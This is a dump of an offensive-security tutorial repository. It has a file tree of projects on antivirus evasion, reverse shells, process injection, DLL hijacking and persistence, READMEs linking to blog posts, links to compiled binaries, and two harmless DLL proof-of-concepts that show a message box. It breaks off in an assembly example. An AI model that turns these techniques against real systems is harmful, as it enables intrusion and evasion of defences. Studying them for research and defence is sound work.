├── 2021-04-09-av-evasion-1- ├── README.md ├── calc.bin ├── evil-enc.cpp ├── evil.cpp ├── evil.exe ├── evil_enc.py └── evil_xor.cpp ├── 2021-09-06-av-evasion-2 ├── README.md ├── enc.py ├── evil-enc.cpp ├── evil.cpp └── evil.exe ├── 2021-09-11-reverse-shells ├── README.md ├── shell └── shell.c ├── 2021-09-15-rev-c-1 ├── README.md ├── enc-aes.py ├── shell-aes.cpp ├── shell.cpp └── shell.exe ├── 2021-09-19-injection-1 ├── README.md ├── evil.cpp ├── evil.exe ├── evil2.exe └── evil_inj.cpp ├── 2021-09-24-dllhijack ├── README.md ├── bginfo-4.16.zip ├── evil.c └── evil.dll ├── 2021-09-24-injection-2 ├── README.md ├── evil.cpp ├── evil.dll ├── evil_inj.cpp └── inj.exe ├── 2021-09-29-processfind-1 ├── README.md ├── evil.cpp ├── evil.dll ├── hack.cpp ├── hack.exe ├── hack2.cpp └── hack2.exe ├── 2021-10-03-malware-analysis-1 ├── README.md ├── peda-session-test1.txt ├── test1 ├── test1.asm └── test1.o ├── 2021-10-08-malware-analysis-2 ├── .gdb_history ├── README.md ├── example1 ├── example1.asm ├── example1.c ├── example1.exe ├── example1.o ├── example2 ├── example2.asm ├── example2.o ├── example3 ├── example3.asm ├── example3.c ├── example3.o ├── hello ├── hello.asm ├── hello.c ├── hello.o ├── hello2 ├── hello2.asm ├── hello2.exe ├── hello2.o ├── hello3 ├── hello3.asm ├── hello3.exe ├── hello3.o ├── hello64 ├── hello64.asm ├── hello64.o ├── peda-session-example1.txt ├── peda-session-example2.txt ├── peda-session-example3.txt ├── peda-session-hello.txt ├── peda-session-hello2.txt ├── peda-session-hello3.txt └── peda-session-hello64.txt ├── 2021-10-09-linux-shellcoding-1 ├── .gdb_history ├── README.md ├── example1 ├── example1.asm ├── example1.o ├── example2 ├── example2.asm ├── example2.o ├── example3 ├── example3.asm ├── example3.o ├── exit0 ├── exit0.c ├── exit1 ├── exit1.asm ├── exit1.o ├── exit2 ├── exit2.asm ├── exit2.o ├── meow ├── meow.c ├── peda-session-dash.txt ├── peda-session-example1.txt ├── peda-session-example2.txt ├── peda-session-run.txt ├── run ├── run.c ├── shell2 └── shell2.c ├── 2021-10-12-dll-hijacking-2 ├── README.md ├── cartoon.cpp ├── cartoon.exe ├── cscapi.def ├── cscapi.dll ├── dll-def.py ├── evil.c ├── evil.dll ├── evil2.c ├── evil2.dll ├── pet.c ├── pet.def └── pet.dll ├── 2021-10-17-linux-shellcoding-2 ├── .gdb_history ├── README.md ├── peda-session-rev.txt ├── rev ├── rev.asm ├── rev.o ├── run ├── run.c ├── shell.c └── super_shellcode.py ├── 2021-10-20-buffer-overflow-1 ├── .gdb_history ├── .gitignore ├── README.md ├── exploit.py ├── vuln └── vuln.c ├── 2021-10-26-windows-shellcoding-1 ├── README.md ├── conv.py ├── example1 ├── example1.asm ├── example1.o ├── exit.c ├── exit.exe ├── getaddr.c ├── getaddr.exe ├── run.c └── run.exe ├── 2021-10-30-windows-shellcoding-2 ├── README.md ├── kernel.asm ├── kernel.exe └── kernel.o ├── 2021-11-11-malware-injection-3 ├── README.md ├── evil.cpp └── evil.exe ├── 2021-11-20-injection-4 ├── README.md ├── hack.cpp └── hack.exe ├── 2021-11-22-malware-injection-5 ├── README.md ├── hack.cpp └── hack.exe ├── 2021-11-23-malware-injection-6 ├── README.md ├── hack.cpp └── hack.exe ├── 2021-11-24-malware-injection-7 ├── README.md ├── evil.cpp ├── evil.dll ├── hack.cpp └── hack.exe ├── 2021-11-26-malware-injection-8 ├── README.md ├── hack.cpp └── hack.exe ├── 2021-11-30-basic-hooking-1 ├── README.md ├── cat.cpp ├── cat.exe ├── example ├── example.asm ├── example.o ├── hooking.cpp ├── hooking.exe ├── hooking2.cpp ├── hooking2.exe ├── pet.cpp └── pet.dll ├── 2021-12-03-inline-asm-1 ├── hack.cpp └── hack.exe ├── 2021-12-06-malware-injection-9 ├── README.md ├── evil.c ├── evil.dll ├── hack.cpp ├── hack.exe ├── mouse.c └── mouse.exe ├── 2021-12-07-malware-injection-10 ├── README.md ├── hack.cpp └── hack.exe ├── 2021-12-11-malware-injection-11 ├── README.md ├── hack.cpp └── hack.exe ├── 2021-12-13-malware-injection-12 ├── README.md ├── hack.cpp └── hack.exe ├── 2021-12-21-simple-malware-av-evasion-3 ├── README.md ├── hack.cpp ├── hack.exe ├── hack2.cpp └── hack2.exe ├── 2022-01-14-malware-injection-13 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-01-17-malware-injection-14 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-01-24-malware-injection-15 ├── README.md ├── hack.cpp ├── hack.exe └── ntddk.h ├── 2022-02-01-malware-injection-16 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-02-07-mem-forensics-1 ├── .gitignore ├── README.md ├── hack.cpp └── hack.exe ├── 2022-02-15-malware-analysis-3 ├── README.md ├── hack.cpp ├── hack.exe └── meow.yar ├── 2022-02-23-malware-analysis-4 ├── README.md ├── hack.cpp ├── hack.exe ├── requirements.txt └── vtscan.py ├── 2022-03-08-basic-hooking-2 ├── README.md ├── hooking.cpp ├── hooking.exe ├── pet.cpp └── pet.dll ├── 2022-03-14-malware-injection-17 ├── hack.cpp ├── hack.exe ├── hack2.cpp └── hack2.exe ├── 2022-03-18-malware-av-evasion-4 ├── README.md ├── dll-def.py ├── encrypt.py ├── hack.cpp ├── hack.exe ├── user32.def └── user32.dll ├── 2022-03-22-malware-av-evasion-5 ├── README.md ├── hack.cpp ├── hack.exe ├── meow.cpp ├── meow.exe └── myhash.py ├── 2022-03-27-malware-analysis-5 ├── classic.cpp ├── classic.exe ├── evil.cpp ├── evil.dll ├── hack.cpp ├── hack.exe └── myhash.py ├── 2022-04-02-malware-injection-18 ├── README.md ├── hack.cpp ├── hack.exe ├── meow.cpp ├── meow.exe └── myhash.py ├── 2022-04-09-malware-av-evasion-6 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-04-13-malware-injection-19 ├── README.md ├── evil.cpp ├── evil.dll ├── hack.cpp └── hack.exe ├── 2022-04-20-malware-pers-1 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-04-26-malware-pers-2 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-05-02-malware-pers-3 ├── README.md ├── evil.cpp ├── evil.dll ├── evil.reg ├── orig.reg ├── pers.cpp └── pers.exe ├── 2022-05-09-malware-pers-4 ├── README.md ├── meow.exe ├── meowsrv.cpp └── meowsrv.exe ├── 2022-05-16-malware-pers-5 ├── README.md ├── evil.cpp ├── evil.dll ├── evil2.cpp ├── pers.cpp └── pers.exe ├── 2022-05-29-malware-pers-6 ├── README.md ├── evil.cpp ├── evil.dll ├── evil2.cpp ├── evil2.dll ├── pers.cpp └── pers.exe ├── 2022-06-05-malware-av-evasion-7 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-06-12-malware-pers-7 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-06-19-malware-pers-8 ├── README.md ├── detect.ps1 ├── evil.cpp ├── evil.dll ├── evil2.dll ├── monitor.cpp ├── monitor.exe ├── pers.cpp └── pers.exe ├── 2022-06-27-malware-injection-20 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-07-13-malware-injection-21 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-07-21-malware-tricks-22 ├── README.md ├── hack.cpp ├── hack.exe ├── meow.bin └── payload_uuid.py ├── 2022-07-29-malware-av-evasion-8 ├── README.md ├── encode.cpp ├── encode.exe ├── hack.cpp ├── hack.exe ├── z85.c └── z85.h ├── 2022-08-16-malware-av-evasion-9 ├── README.md ├── hack.cpp ├── hack.exe └── meow.bin ├── 2022-08-26-malware-pers-9 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp ├── pers.exe └── test.txt ├── 2022-09-06-malware-tricks-23 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-09-10-malware-pers-10 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp ├── pers.exe ├── pers2.cpp └── pers2.exe ├── 2022-09-15-malware-av-evasion-10 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-09-20-malware-pers-11 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-09-25-token-theft-1 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-09-30-malware-pers-12 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-10-04-malware-pers-13 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-10-09-malware-pers-14 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-10-12-malware-pers-15 ├── README.md ├── dll-def.py ├── evil.c ├── evil.dll └── suspend.dll ├── 2022-10-21-malware-pers-16 ├── README.md ├── hack.c ├── hack.dll ├── pers.cpp └── pers.exe ├── 2022-10-28-malware-pers-17 ├── hack.cpp └── pers.cpp ├── 2022-10-28-token-theft-2 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-11-02-malware-pers-18 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2022-11-05-malware-analysis-6 ├── aes.bin ├── aes.py ├── entropy.py ├── hack.cpp ├── hack.exe ├── hack2.cpp ├── hack2.exe ├── meow.bin ├── xor.bin └── xor.py ├── 2022-11-16-malware-pers-19 ├── README.md ├── hack.cpp ├── hack.dll ├── pers.cpp └── pers.exe ├── 2022-11-27-malware-tricks-24 ├── README.md ├── hack.cpp └── hack.exe ├── 2022-12-21-malware-tricks-25 ├── README.md ├── evil.c ├── evil.dll ├── hack.cpp ├── hack.exe ├── hack2.cpp ├── hack2.exe ├── hack3.cpp └── hack3.exe ├── 2023-01-04-malware-tricks-26 ├── README.md ├── hack.cpp └── hack.exe ├── 2023-01-20-malware-pers-21 ├── README.md ├── hack.cpp ├── hack.exe ├── pers.cpp └── pers.exe ├── 2023-01-27-malware-analysis-7 ├── README.md ├── crc32.py ├── crc32.yar ├── hack.cpp ├── hack.exe ├── hack2.cpp └── hack2.exe ├── 2023-02-10-malware-analysis-8 ├── README.md ├── hack.cpp ├── hack.exe ├── murmur.py └── murmur.yar ├── 2023-02-13-malware-av-evasion-11 ├── README.md ├── des.py ├── entropy.py ├── hack.cpp ├── hack.exe ├── hack2.cpp ├── hack2.exe ├── hack3.cpp └── hack3.exe ├── 2023-02-20-malware-av-evasion-12 ├── entropy.py ├── hack.c ├── hack.exe ├── hack2.c ├── hack2.exe ├── hack3.c ├── hack3.exe ├── hack4.c ├── hack4.exe └── tea.py ├── 2023-03-09-malware-av-evasion-13 ├── README.md ├── entropy.py ├── madryga.c ├── madryga.exe ├── meow.bin └── meow.py ├── 2023-03-24-malware-av-evasion-14 ├── README.md ├── entropy.py ├── hack.c ├── hack.exe ├── hack2.c ├── hack2.exe ├── hack3.c └── hack3.exe ├── 2023-04-08-malware-av-evasion-15 ├── README.md ├── hack.cpp └── hack.exe ├── 2023-04-16-malware-av-evasion-16 ├── README.md ├── hack.cpp └── hack.exe ├── 2023-04-27-malware-tricks-27 ├── README.md ├── hack.cpp ├── hack.exe ├── pet.c └── pet.dll ├── 2023-05-11-malware-tricks-28 ├── README.md ├── hack.cpp └── hack.exe ├── 2023-05-22-malware-tricks-29 ├── README.md ├── hack.cpp ├── hack.exe ├── hack2.cpp └── hack2.exe ├── 2023-05-26-malware-tricks-30 ├── README.md ├── evil.c ├── evil.dll ├── hack.cpp ├── hack.exe ├── hack2.cpp └── hack2.exe ├── 2023-06-04-malware-tricks-31 ├── README.md ├── hack.c └── hack.exe ├── 2023-06-07-syscalls-1 ├── README.md ├── evil.c ├── evil.dll ├── hack.c ├── hack.exe ├── hack2.c └── hack2.exe ├── 2023-06-09-syscalls-2 ├── README.md ├── hack.c ├── hack.exe ├── hack.o ├── syscall.asm └── syscall.o ├── 2023-06-19-malware-av-evasion-17 ├── README.md ├── hack.c └── hack.exe ├── 2023-06-26-malware-av-evasion-18 ├── README.md ├── hack.c ├── hack.exe ├── hack2.c └── hack2.exe ├── 2023-07-07-malware-trick-34 ├── README.md ├── evil.c ├── evil.dll ├── hack.c ├── hack.exe ├── hack2.c └── hack2.exe ├── 2023-07-16-malware-pers-22 ├── ErrorHandler.cmd ├── README.md ├── hack.c ├── hack.exe ├── pers.c └── pers.exe ├── 2023-07-26-malware-trick-35 ├── README.md ├── hack.c ├── hack.exe └── meow.txt ├── 2023-08-13-malware-cryptography-1 ├── README.md ├── hack.c └── hack.exe ├── 2023-08-28-malware-cryptography-20 ├── README.md ├── hack.c └── hack.exe ├── 2023-09-25-malware-trick-36 ├── README.md ├── hack.c └── hack.exe ├── 2023-10-20-malware-cryptography-21 ├── README.md ├── hack.c └── hack.exe ├── 2023-11-07-malware-trick-37 ├── README.md ├── hack.c └── hack.exe ├── 2023-11-23-malware-cryptography-22 ├── README.md ├── encrypt.py ├── entropy.py ├── hack.c └── hack.exe ├── 2023-12-10-malware-pers-23 ├── README.md ├── hack.c ├── hack.exe └── pers.ps1 ├── 2023-12-14-malware-av-evasion-19 └── hack.c ├── 2023-12-25-malware-cryptography-23 ├── README.md ├── hack.c └── hack.exe ├── 2024-01-16-malware-cryptography-24 ├── README.md ├── hack.c ├── hack.exe ├── hack2.c ├── hack2.exe ├── test-decrypted.txt ├── test-encrypted.bin └── test.txt ├── 2024-02-21-malware-cryptography-25 ├── README.md ├── hack.c └── hack.exe ├── 2024-02-29-malware-av-evasion-19 └── hack.c ├── 2024-03-12-malware-pers-24 ├── README.md ├── hack.c ├── hack.dll ├── pers.c └── pers.exe ├── 2024-04-09-malware-cryptography-26 ├── README.md ├── hack.c └── hack.exe ├── 2024-04-19-malware-trick-38 ├── hack.c ├── hack.exe ├── hack.rc ├── icon.o ├── notepad.ico └── notepad.png ├── 2024-05-01-malware-trick-38 ├── README.md ├── hack.c ├── hack.exe ├── hack2.c ├── hack2.exe ├── hack3.c └── hack3.exe ├── 2024-05-12-malware-cryptography-27 ├── hack.c ├── hack.exe └── test.txt ├── 2024-06-01-malware-cryptography-28 ├── README.md ├── hack.exe ├── hack.nim ├── hack1.c ├── hack1.exe ├── hack2.exe └── hack2.nim ├── 2024-06-12-malware-trick-39 ├── hack.exe └── hack.nim ├── 2024-06-16-malware-trick-40 ├── README.md ├── hack.c ├── hack.exe └── mybot.py ├── 2024-06-20-linux-kernel-hacking-1 ├── Makefile ├── README.md └── hack.c ├── 2024-06-25-malware-trick-41 ├── README.md ├── hack.c ├── hack.exe ├── meow.c └── meow.exe ├── 2024-06-28-malware-trick-42 ├── README.md ├── hack.c └── hack.exe ├── 2024-07-08-malware-pers-25 ├── README.md ├── hack.c ├── hack.exe ├── pers.c └── pers.exe ├── 2024-07-16-malware-cryptography-29 ├── README.md ├── hack.c └── hack.exe ├── 2024-07-21-malware-cryptography-30 ├── README.md ├── hack.c └── hack.exe ├── 2024-07-29-malware-cryptography-31 ├── README.md ├── hack.c ├── hack.exe ├── hack2.c ├── hack2.exe ├── hack3.c ├── hack3.exe └── myhash.py ├── 2024-08-14-malware-pers-26 ├── README.md ├── hack.c ├── hack.dll ├── pers.c └── pers.exe ├── 2024-09-12-malware-cryptography-32 ├── README.md ├── hack.c └── hack.exe ├── 2024-09-16-linux-hacking-2 ├── README.md ├── hack ├── hack.c ├── hack2 ├── hack2.c ├── hack3 └── hack3.c ├── 2024-09-30-malware-trick-43 ├── README.md ├── bin2data.py ├── deshuffled.bin ├── entropy.py ├── hack.c ├── hack.exe ├── hack2.c ├── hack2.exe ├── hack3.c ├── hack3.exe ├── meow.bin └── shuffled.bin ├── 2024-10-20-malware-cryptography-33 ├── README.md ├── hack ├── hack.c ├── hack2.c └── hack2.exe ├── 2024-11-10-malware-cryptography-34 ├── README.md ├── hack.c └── hack.exe ├── 2024-11-22-linux-hacking-3 ├── README.md ├── hack ├── hack.c ├── meow └── meow.c ├── 2024-11-30-malware-cryptography-35 ├── README.md ├── hack.c └── hack.exe ├── 2024-12-16-malware-cryptography-36 ├── README.md ├── hack ├── hack.c ├── hack2.c ├── hack2.exe ├── hack3 ├── hack3.c ├── hack4.c └── hack4.exe ├── 2024-12-23-malware-cryptography-37 ├── README.md ├── hack ├── hack.c └── sbox_nonlinearity.py ├── 2024-12-29-malware-cryptography-38 ├── entropy.py ├── hack.c ├── hack.exe ├── sbox-analyses.py └── sbox-nonlinearity.py ├── 2025-01-16-malware-cryptography-39 ├── hack.c └── hack.exe ├── 2025-01-19-malware-tricks-44 ├── README.md ├── hack.c └── hack.exe ├── 2025-02-01-linux-hacking-4 ├── hack └── hack.c ├── 2025-02-24-malware-trick-45 ├── cat.png ├── hack ├── hack.c ├── hack.exe ├── stego.png └── vtscan.py ├── 2025-03-12-malware-pers-27 ├── hack.c ├── hack.exe ├── pers.c └── pers.exe ├── 2025-04-02-malware-cryptography-40 ├── README.md ├── hack.exe └── hack.nim ├── 2025-04-10-malware-cryptography-41 ├── hack.exe └── hack.nim ├── 2025-05-01-malware-tricks-46 ├── hack.c └── hack.exe ├── 2025-05-10-malware-tricks-47 ├── hack.c ├── hack.exe ├── hack2.c ├── hack2.exe ├── hack3.c └── hack3.exe ├── 2025-05-29-malware-cryptography-42 ├── hack ├── hack.c ├── hack2.c ├── hack2.exe ├── hack3 ├── hack3.c └── vtscan.py ├── README.md ├── hvck ├── 2022-12-01-malware-analysis-online │ ├── 2022-02-23_14-48.png │ ├── README.md │ ├── locker.exe │ ├── ms.py │ ├── shell.exe │ └── vt.py ├── 2023-01-01-rf-wifi │ ├── README.md │ ├── hack.py │ └── photo_2023-01-04_15-55-20.jpg ├── 2023-01-12-zte-crack │ ├── 2023-01-15_05-56.png │ ├── README.md │ ├── wordlist.txt │ └── zte_hack.py ├── 2023-03-04-binary-edge │ ├── 2023-03-05_17-08.png │ ├── README.md │ └── search.py ├── 2023-03-05-encshell │ ├── 2023-03-08_20-56.png │ ├── enc.c │ ├── enc.exe │ ├── entropy.py │ ├── hack.c │ ├── hack.exe │ ├── hack0.c │ ├── hack0.exe │ └── meow.bin └── 2024-05-01-nim-injection │ ├── README.md │ ├── hack.exe │ ├── hack.nim │ ├── hack2.exe │ ├── hack2.nim │ ├── hello.exe │ ├── hello.nim │ ├── img │ ├── 2024-06-01_12-02.png │ ├── 2024-06-01_12-08.png │ ├── 2024-06-01_12-10.png │ ├── 2024-06-01_12-10_1.png │ ├── 2024-06-01_12-11.png │ ├── 2024-06-01_12-12.png │ ├── 2024-06-01_12-15.png │ ├── 2024-06-01_12-42.png │ ├── 2024-06-01_12-45.png │ ├── 2024-06-01_12-53.png │ ├── 2024-06-01_12-55.png │ └── 2024-06-01_12-56.png │ ├── xorE.exe │ └── xorE.nim └── meow.png /2021-04-09-av-evasion-1-/README.md: -------------------------------------------------------------------------------- 1 | # AV engines evasion for C++ simple malware - part 1 2 | 3 | Source code of post: 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html](https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html) 6 | -------------------------------------------------------------------------------- /2021-04-09-av-evasion-1-/calc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-04-09-av-evasion-1-/calc.bin -------------------------------------------------------------------------------- /2021-04-09-av-evasion-1-/evil.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-04-09-av-evasion-1-/evil.exe -------------------------------------------------------------------------------- /2021-09-06-av-evasion-2/README.md: -------------------------------------------------------------------------------- 1 | # AV engines evasion for C++ simple malware - part 2 2 | 3 | Source code of post: 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html](https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html) 6 | -------------------------------------------------------------------------------- /2021-09-06-av-evasion-2/evil.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-06-av-evasion-2/evil.exe -------------------------------------------------------------------------------- /2021-09-11-reverse-shells/README.md: -------------------------------------------------------------------------------- 1 | # Reverse shells. Simple reverse shell in C 2 | 3 | Source code of post: 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/09/11/reverse-shells.html](https://cocomelonc.github.io/tutorial/2021/09/11/reverse-shells.html) 6 | -------------------------------------------------------------------------------- /2021-09-11-reverse-shells/shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-11-reverse-shells/shell -------------------------------------------------------------------------------- /2021-09-15-rev-c-1/README.md: -------------------------------------------------------------------------------- 1 | # Simple C++ reverse shell for windows 2 | 3 | Source code of post: 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/09/15/simple-rev-c-1.html](https://cocomelonc.github.io/tutorial/2021/09/15/simple-rev-c-1.html) 6 | -------------------------------------------------------------------------------- /2021-09-15-rev-c-1/shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-15-rev-c-1/shell.exe -------------------------------------------------------------------------------- /2021-09-19-injection-1/README.md: -------------------------------------------------------------------------------- 1 | # C++ code injection to another process 2 | 3 | Simple classic code injection to another process. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/09/18/malware-injection-1.html](https://cocomelonc.github.io/tutorial/2021/09/18/malware-injection-1.html) 6 | -------------------------------------------------------------------------------- /2021-09-19-injection-1/evil.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-19-injection-1/evil.exe -------------------------------------------------------------------------------- /2021-09-19-injection-1/evil2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-19-injection-1/evil2.exe -------------------------------------------------------------------------------- /2021-09-24-dllhijack/README.md: -------------------------------------------------------------------------------- 1 | # DLL hijacking in windows. 2 | 3 | Classic DLL hijacking in windows. Simple C Proof of Concept. 4 | 5 | [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html) 6 | -------------------------------------------------------------------------------- /2021-09-24-dllhijack/bginfo-4.16.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-dllhijack/bginfo-4.16.zip -------------------------------------------------------------------------------- /2021-09-24-dllhijack/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | DLL hijacking example 3 | author: @cocomelonc 4 | https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html 5 | */ 6 | 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 11 | switch (ul_reason_for_call) { 12 | case DLL_PROCESS_ATTACH: 13 | MessageBox( 14 | NULL, 15 | "Meow-meow!", 16 | "=^..^=", 17 | MB_OK 18 | ); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } 29 | -------------------------------------------------------------------------------- /2021-09-24-dllhijack/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-dllhijack/evil.dll -------------------------------------------------------------------------------- /2021-09-24-injection-2/README.md: -------------------------------------------------------------------------------- 1 | # C++ DLL injection to another process 2 | 3 | Simple classic DLL injection to another process. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html](https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html) 6 | -------------------------------------------------------------------------------- /2021-09-24-injection-2/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2021-09-24-injection-2/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-injection-2/evil.dll -------------------------------------------------------------------------------- /2021-09-24-injection-2/inj.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-injection-2/inj.exe -------------------------------------------------------------------------------- /2021-09-29-processfind-1/README.md: -------------------------------------------------------------------------------- 1 | # Find process by name and inject DLL to it. 2 | 3 | Find process PID by name and inject to it. Simple C++ proof of concept. 4 | 5 | [https://cocomelonc.github.io/pentest/2021/09/29/findmyprocess.html](https://cocomelonc.github.io/pentest/2021/09/29/findmyprocess.html) 6 | -------------------------------------------------------------------------------- /2021-09-29-processfind-1/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2021-09-29-processfind-1/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-29-processfind-1/evil.dll -------------------------------------------------------------------------------- /2021-09-29-processfind-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-29-processfind-1/hack.exe -------------------------------------------------------------------------------- /2021-09-29-processfind-1/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-29-processfind-1/hack2.exe -------------------------------------------------------------------------------- /2021-10-03-malware-analysis-1/README.md: -------------------------------------------------------------------------------- 1 | # Intro to x86 assembly language 2 | 3 | Simple example x86 assembly. First post in series. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/10/03/malware-analysis-1.html](https://cocomelonc.github.io/tutorial/2021/10/03/malware-analysis-1.html) 6 | -------------------------------------------------------------------------------- /2021-10-03-malware-analysis-1/peda-session-test1.txt: -------------------------------------------------------------------------------- 1 | break _start 2 | 3 | -------------------------------------------------------------------------------- /2021-10-03-malware-analysis-1/test1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-03-malware-analysis-1/test1 -------------------------------------------------------------------------------- /2021-10-03-malware-analysis-1/test1.asm: -------------------------------------------------------------------------------- 1 | ; first program in asm 2 | ; author @cocomelonc 3 | 4 | section .data 5 | 6 | section .bss 7 | 8 | section .text 9 | global _start ; must be declared for linker 10 | 11 | _start: ; linker entry point 12 | mov eax, 100 ; mov 100 into the EAX register 13 | 14 | ; normal exit 15 | exit: 16 | mov eax, 1 ; sys_exit system call 17 | mov ebx, 0 ; exit code 0 successfull execution 18 | int 0x80 ; call sys_exit 19 | -------------------------------------------------------------------------------- /2021-10-03-malware-analysis-1/test1.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-03-malware-analysis-1/test1.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/README.md: -------------------------------------------------------------------------------- 1 | # NASM tutorial. Malware analysis part 2. 2 | 3 | NASM tutorial. Malware analysis part 2. Linux 32-bit and Windows PE file examples. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/10/08/malware-analysis-2.html](https://cocomelonc.github.io/tutorial/2021/10/08/malware-analysis-2.html) 6 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example1 -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example1.asm: -------------------------------------------------------------------------------- 1 | ; example1.asm 2 | ; author: @cocomelonc 3 | ; run: 4 | ; nasm -f elf32 